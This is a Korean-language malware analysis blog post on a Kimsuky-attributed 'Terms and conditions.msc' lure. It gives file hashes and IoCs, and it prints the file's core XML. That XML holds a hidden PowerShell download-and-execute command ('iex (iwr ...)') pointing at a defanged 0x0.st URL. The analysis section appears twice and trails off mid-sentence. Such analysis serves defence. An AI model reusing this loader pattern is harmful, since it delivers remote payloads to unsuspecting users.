김수키(Kimsuky) 에서 만든 악성코드-Terms and conditions(이용 약관).msc(2024.9.6)
Contents
오늘은 김수키(Kimsuky) 에서 만든 악성코드-Terms and conditions.msc에 대해 알아보겠습니다.
일단 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:Terms and conditions.msc
사이즈:141 KB
MD5:81d224649328a61c899be9403d1de92d
SHA-1:f4895809cb38fa1f225340e99c05e477a5017111
SHA-256:cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09
해당 악성코드는 Terms and conditions(이용 약관) 이라는 제목으로 유포하고 있으며 PowerShell을 사용하여 외부에서 스크립트를 다운로드하고 실행하는 동작을 하는 것이 특징입니다.
악성코드 핵심 코드
<ConsoleTaskpads>
<ConsoleTaskpad ListSize="Med(i)um" IsNodeSpecific="true"
ReplacesDefaultView="true" NoRes(u)lts="true" DescriptionsAsText="true"
NodeType="{C96401CE-0E17-1(1)D3-885B-(0)0C04F72C717}" ID="{656F3A6A-1A63
-4FC4-9C9B(-)4B75AF6DF3A3}">
<String Name="N(a)me" ID="4"/>
<String Name="Desc(r)iption" Value=""/>
<String Name="Tool(t)ip" Value=""/>
<Tasks>
<Task Type="CommandLi(n)e" Command="powershell.exe">
<String Name="Nam(e)" ID="5"/>
<String Name="De(s)cription" ID="11"/>
<Symbol>
<Image Name="Smal(l)" BinaryRefIndex="6"/>
<Image Name="L(a)rge" BinaryRefIndex="7"/>
</Symbol>
<CommandLine Direct(o)ry="" Wi(n)dowState="Minimized" Params=
"-WindowStyle Hidden -Command iex (iwr -Uri 'hxxps://0x0(.)st/Xyl7(.)txt'
-UseBasicParsing)"/>
</Task>
</Tasks>
<BookMark Name="TargetNode" NodeID="1"/>
</ConsoleTaskpad>
악성코드 분석
PowerShell 명령
Params="-WindowStyle Hidden -Co(m)mand iex (iwr (-)Uri 'hxxps://0x0(.)st/Xyl7(.)txt' -UseBasicParsing)
iex는 Invoke-Expression: 주어진 코드를 실행하는 PowerShell 명령
iwr는 Invoke-WebRequest:외부에서 파일을 다운로드하거나 데이터를 가져오는 명령.
iwr -Uri 'hxxps://0x0(.)st/Xyl7(.)txt' -UseBasicParsing은 실행 시 외부 서버에 접속하고 파일을 다운로드하려고 시도
-WindowStyle Hidden 옵션을 사용해서 PowerShell 창이 숨겨진 상태로 실행되도록 설정사용자에게 노출되지 않도록 은밀하게 실행하기 위해서 존재를 합니다.
해당 사이트에 강제 접속을 해보면 다음과 같이 $encodedData = 부분이 악성코드 다운로드 되는 부분이 이며 CyberChef 로 강제로 HEX를 열어 보면 해당 악성코드는 exe 파일인 것을 확인할 수가 있으며 해당 부분만 원한다면 해당 …
일단 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:Terms and conditions.msc
사이즈:141 KB
MD5:81d224649328a61c899be9403d1de92d
SHA-1:f4895809cb38fa1f225340e99c05e477a5017111
SHA-256:cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09
해당 악성코드는 Terms and conditions(이용 약관) 이라는 제목으로 유포하고 있으며 PowerShell을 사용하여 외부에서 스크립트를 다운로드하고 실행하는 동작을 하는 것이 특징입니다.
악성코드 핵심 코드
<ConsoleTaskpads>
<ConsoleTaskpad ListSize="Med(i)um" IsNodeSpecific="true"
ReplacesDefaultView="true" NoRes(u)lts="true" DescriptionsAsText="true"
NodeType="{C96401CE-0E17-1(1)D3-885B-(0)0C04F72C717}" ID="{656F3A6A-1A63
-4FC4-9C9B(-)4B75AF6DF3A3}">
<String Name="N(a)me" ID="4"/>
<String Name="Desc(r)iption" Value=""/>
<String Name="Tool(t)ip" Value=""/>
<Tasks>
<Task Type="CommandLi(n)e" Command="powershell.exe">
<String Name="Nam(e)" ID="5"/>
<String Name="De(s)cription" ID="11"/>
<Symbol>
<Image Name="Smal(l)" BinaryRefIndex="6"/>
<Image Name="L(a)rge" BinaryRefIndex="7"/>
</Symbol>
<CommandLine Direct(o)ry="" Wi(n)dowState="Minimized" Params=
"-WindowStyle Hidden -Command iex (iwr -Uri 'hxxps://0x0(.)st/Xyl7(.)txt'
-UseBasicParsing)"/>
</Task>
</Tasks>
<BookMark Name="TargetNode" NodeID="1"/>
</ConsoleTaskpad>
악성코드 분석
PowerShell 명령
Params="-WindowStyle Hidden -Co(m)mand iex (iwr (-)Uri 'hxxps://0x0(.)st/Xyl7(.)txt' -UseBasicParsing)
iex는 Invoke-Expression: 주어진 코드를 실행하는 PowerShell 명령
iwr는 Invoke-WebRequest:외부에서 파일을 다운로드하거나 데이터를 가져오는 명령.
iwr -Uri 'hxxps://0x0(.)st/Xyl7(.)txt' -UseBasicParsing은 실행 시 외부 서버에 접속하고 파일을 다운로드하려고 시도
-WindowStyle Hidden 옵션을 사용해서 PowerShell 창이 숨겨진 상태로 실행되도록 설정사용자에게 노출되지 않도록 은밀하게 실행하기 위해서 존재를 합니다.
해당 사이트에 강제 접속을 해보면 다음과 같이 $encodedData = 부분이 악성코드 다운로드 되는 부분이 이며 CyberChef 로 강제로 HEX를 열어 보면 해당 악성코드는 exe 파일인 것을 확인할 수가 있으며 해당 부분만 원한다면 해당 …
IoC
81d224649328a61c899be9403d1de92d
f4895809cb38fa1f225340e99c05e477a5017111
cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09
f4895809cb38fa1f225340e99c05e477a5017111
cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09